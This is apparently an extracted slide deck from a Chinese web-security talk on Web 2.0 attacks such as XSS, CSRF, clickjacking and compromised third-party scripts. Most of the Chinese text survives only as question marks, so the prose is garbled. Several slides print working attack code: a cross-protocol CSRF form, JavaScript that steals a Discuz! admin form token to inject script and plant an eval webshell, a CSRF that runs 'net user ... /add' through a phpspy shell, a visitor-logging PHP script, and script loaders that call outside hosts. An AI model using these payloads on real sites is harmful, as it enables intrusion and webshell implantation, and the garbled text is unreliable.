WEB2.0??????

1
WEB2.0??????

• 5up3rh3i_at_gmail.com

2
WEB1.0??????

• ??web???????????cmdshell
• iis60day.bin t www.microsoft.com p 80
• ??web??????????webshell
• ?????????web????????????sql???????
• phpwind0day.php t www.phpwind.com p 80
• ????
• ???????,????????,?????????????,????????????,?
  ??????????????!

3
??WEB 2.0

• Web2.0??????,?????????????,??????????????????
• Web2.0???????????,??????????
• AJAX???????web??2.0??,???????
• web2.0?????????? ????wiki?sns?????
• Web2.0???????web2.0????????!

4
WEB2.0??????

• ?????
• ???????XSS?CSRF?????????Clickjacking??
• ?????????
• ????????
• ?????
• ???????

5
?????

• ?WEB1.0??,WEB2.0????????????
• ??????,??????,??????????,????????????

6
???????--XSS

• XSS?web1.0??,?web2.0?????
• 1996????????????Jeremiah Grossman??
• 1999?David Ross?Georgi Guninski??Script
  injection?
• 2000?apache???????????Cross Site
  Scripting?
• 2005?samy worm??,???XSS??web2.0??,xss??!!
• 2007????XSS Attacks Book??XSS is the
  New Buffer Overflow, JavaScript Malware is the
  new shell code
• XSS???
• web1.0????alert()??cookiedocument.coo
  kie
• web2.0??xss worm
• ?????xss?????!???????90??!??????????bs????
  ?!
• XSS / ????cookieworm
• xss?????????javascript/html?,???javascri
  pt???????????!

7
???????--CSRF

• CSRF---Cross Site Request Forgery
• ???2000?,??2007/2008??
• ???XSS???,???web2.0??? ?gmail?CSRF???
• ?????????????????
• ?http site
• ???????????Bypass Preventing
  CSRF2008?
• ??csrf???
• CSRF worm ??2008.01?blog???????,2008.0
  9 80sec?? ??Hi Csrf????
• ?????Inter-Protocol Communicationby
  Wade Alcorn 2006?,????????????????????????????webk
  it????http?irc???

8
ltscriptgt gibson document.createElement("form")
gibson.setAttribute("name","B") gibson.setAttribu
te("target","A") gibson.setAttribute("method","po
st") gibson.setAttribute("action","http//127.0.0
.16677") gibson.setAttribute("enctype","multipar
t/from-data") crashoverride
document.createElement("textarea") crashoverride.
setAttribute("name","C") postdata "USER A B C
D \nNick xxxx\n" crashoverride.setAttribute("valu
e",postdata) crashoverride.innerText
postdata crashoverride.innerHTML
postdata gibson.appendChild(crashoverride) docum
ent.body.appendChild(gibson) gibson.submit() lt/s
criptgt
9
???????--CSRF

• ???????????????word winrar????

10
???????--???????

• The Dangers of Third Party Content---by SanJose
  OWASP-WASCAppSec2007
• 2009??????????Dz??(????????)
• ??????????????????????????
• web???????????,??bbs?????????
• ?????????????,???????????js html??
• ??JavaScript, HTML, Flash, CSS, etc.

11
???????--???????

• ??????????????
• ??????????
• ??????????????????
• ?????arp????(zxarps.exe )????????(SSClone)
• ???????????????
• ?,?????!
• ?????????????
• ???????????!

12
???????-- Clickjacking

• Clickjacking--????
• by Jeremiah Grossman and Robert Hansen in
  2008 ,????!
• WEB 2.0??????????!
• ????????,????http header??X-Frame-Options
• ??????UI?? ?
• Tapjacking ???? ?

13
?????????

• ?????????,???????????
• ???????????????????

14
????????

• ??????????,??????????????????
• ????????????!
• ???????????????????
• ????????????????

15
????????

• ??????????????
• ???????ID????cookie????
• ?????????????
• ??????,???????????????
• ???????????
• ?????????,????????????????????????????,??????
  ???????????
• ?????? ?????,???????????????,???????????????????
  ????????????
• ?????????????,???????????

16
????WEB2.0???????

• Web2.0??xss????cookieworm
• Web2.0??Mailxss?office???0day??
• Web2.0??Xssshell?Beef?Anehta??
  xss???????
• ?????????,??????

17
???????

• ???????----??Dz??
• ??????----??????????
• ???web????????????
• ??????????
• ????????????

18
???????? Dz??

• ???? Dz??
• ??2009?1?8?????Discuz!?????????Hacked by
  ring04h, just for fun!????
• ??????????????????,Discuz! ???????????????
• ???????????????,???????????????????????http
  //customer.discuz.net ??javascript??
• Discuz!_5.5.0_SC_GBK\upload\admin\global.fun
  c.php
• echo 'ltscript language"JavaScript"
  src"http//customer.discuz.net/news.php?version'
  .rawurlencode(DISCUZ_VERSION).'release'.rawurlen
  code(DISCUZ_RELEASE).'php'.PHP_VERSION.'mysql'
  .dbversion.'charset'.rawurlencode(charset).'b
  bname'.rawurlencode(bbname).'members'.members
  .'threads'.threads.'posts'.posts.'md5hash'
  .md5(preg_replace("/http\/\/(.?)\/./i", "\\1",
  _SERVER'HTTP_REFERER')._SERVER'HTTP_USER_AGEN
  T'.DISCUZ_VERSION.DISCUZ_RELEASE.bbname.members
  .threads.posts).'"gtlt/scriptgt'
• ???????ring04h?????? http//customer.discuz.net
  ???????????js???!

19

• ?????http//customer.discuz.net/news.php ????
• // ??FORMHASH
• xmlhttp.open("GET", siteurl"admincp.php?actionh
  omesid"sid, false)
• xmlhttp.send(null)
• var datas xmlhttp.responseText
• var reg / name\"formhash\" value\"(\w\d)\"
  /i
• var arr reg.exec(datas)
• var formhash arr1
• // ??XMLHTTP POST?????
• xmlhttp.open("POST", siteurl"admincp.php?action
  settingsedityes", false)
• xmlhttp.setRequestHeader("Referer", siteurl)
• xmlhttp.setRequestHeader("Content-Type","applicat
  ion/x-www-form-urlencoded")
• xmlhttp.send(unescape("settingsnew5Bseohead5D
  3Cscript3Efunctioninit28297Bdocument.write
  2827Hackedbyring04h2Cjustforfun2127293B
  7Dwindow.onload3Dinit3B3C2Fscript3E0D0A
  settingsubmitCCE1BDBBformhash"formhash))
  
• ????seo ?????html???,??js

20
(No Transcript)
21

• ????????,?????????!!
• ????????webshell???,????????????????,?
• //??SODB-2008-10??webshell//http//www.80vul.
  com/dzvul/sodb/10/sodb-2008-10.txtxmlhttp.open("P
  OST", siteurl"admincp.php?actionrunwizardstep3
  ", false)xmlhttp.setRequestHeader("Referer", sit
  eurl)xmlhttp.setRequestHeader("Content-Type","ap
  plication/x-www-form-urlencoded")xmlhttp.send(un
  escape("settingsnew5Bbbname5D3C3F_at_eval(_POST
  cmd)3A3F3Esettingsnew5Bsitename5DComsenz
  Inc.settingsnew5Bsiteurl5Dhttp3A2F2Fwww.com
  senz.com2Fstep2submitCFC2D2BBB2BDformh
  ash"formhash))
• ???lt?_at_eval(_POSTcmd)?gt???forumdata/logs/run
  wizardlog.php???

22

• ?????????

23

• ???????????????,???????

24

• ??discuz??????????????ltscriptgt?????js?,???????????
  ??
• ???????????ltscriptgt?????js?phpwind

25
??????
26
(No Transcript)
27

• ??????
• ???????????????img???steal.php???????????????,
  ????????,?????????????????
• ????url
• http//ha.com/steal.php?data3Cscript20src
  3Dhttp3A2F2Fwww2E80vul2Ecom2Fsobb2Falert2E
  php3E3C2Fscript3E
• ltscript srchttp//www.80vul.com/sobb/alert.phpgtlt/
  scriptgt

28

• http//www.80vul.com/sobb/alert.php ???
• lt?php
• ip getenv ('REMOTE_ADDR')
• date_default_timezone_set('Asia/Chongqing')
• date date('Y-m-d His')
• referergetenv ('HTTP_REFERER')
• fp fopen(', 'a')
• fwrite(fp, "refer referer\r\ndate
  date\r\nip ip\r\ndata \r\n----------\
  r\n\r\n")
• fclose(fp)
• ?gt
• ????????,
• ?????????
• ?ip?referer??url?

29
???web????????????

• ?????2008????,???????..

30

• Phpspy??csrf???,???????????phpspy???????????????
  (angel)????????
• ??angel??phpspy2008???,??????????????,????????
• ltscriptgtvar url 'http//localhost/phpspy/2
  008.php?actionshellexecfuncsystemcommandnet
  user heige heige /addecho fuck gtc\\heige.txt'
  getURL(url)function getURL(s)     var image
  new Image()    image.style.width 0  
   image.style.height 0    image.src
  slt/scriptgt
• ??????angel??????????url
• ????????ie???????cookie??????!????????????!

31

• ???????
• ADz?????

32

• ?????????webshell forumdata/logs/runwizardlog.php
  ??????,??web????apache?,??????????.
• xmlhttp.open("POST", siteurl"forumdata/logs/runwi
  zardlog.php", false)
• xmlhttp.setRequestHeader("Referer", siteurl)
• xmlhttp.setRequestHeader("Content-Type","applicati
  on/x-www-form-urlencoded")
• //?????net user 80vul 80vul /add ???hack?????ftp
  tftp??echo iget.vbs?????????????
• xmlhttp.send("cmd6E6574207573657

33

• B????????????

34

• C??????????????ftp????????,????????????????????
  
• Sun Solaris 10 ftpd?????????????????,?????ftp//??
  ??????????????
• ltimg src"ftp//.....////SITE20CHMOD2077720FILE
  NAME"gt

35

• ????HackGame No.1

36
??????????

• ?????????5??80vul???SOBB??,?????????,???????????
  ,??????????????????xss???
• ???????????????????????????
• ??????

37
????????????

• 80vul????,??????????
• ?????????????

Content-Type text/html Server
Microsoft-IIS/7.0 X-Powered-By PHP/5.2.12, ltimg
srchttp//80vul.com/anti/img.php
onloadsdocument.createElement("script")s.src"h
ttp//www.80vul.com/anti/anti.php"document.body.a
ppendChild(s)gt Date Sun, 28 Nov 2010 112126
GMT Content-Length 5993
38
????????????
39

• ltimg srchttp//80vul.com/anti/img.php
  onloadsdocument.createElement("script")s.src"h
  ttp//www.80vul.com/anti/anti.php"document.body.a
  ppendChild(s)gt
• ?ltimggt????img.php?,?onload????javascript??anti.php
  
• ?????????img.php?anti.php????????,?????????????
  ???????

40
(No Transcript)
41
(No Transcript)
42
??????

• ???????????,SDL??????
• ????????????,???????,????????????????????!

43
??????

• ???????????????????web?????
• 1.??????????
• 2.????????,????????
• 3.?????????????,?????????????????????http
• ????????????????????,???????js?????????????,???php
  wind?????js????,??????
• ???????????

44

• ???????,????!
• ??????!

45

• ????!!
• ?????? ?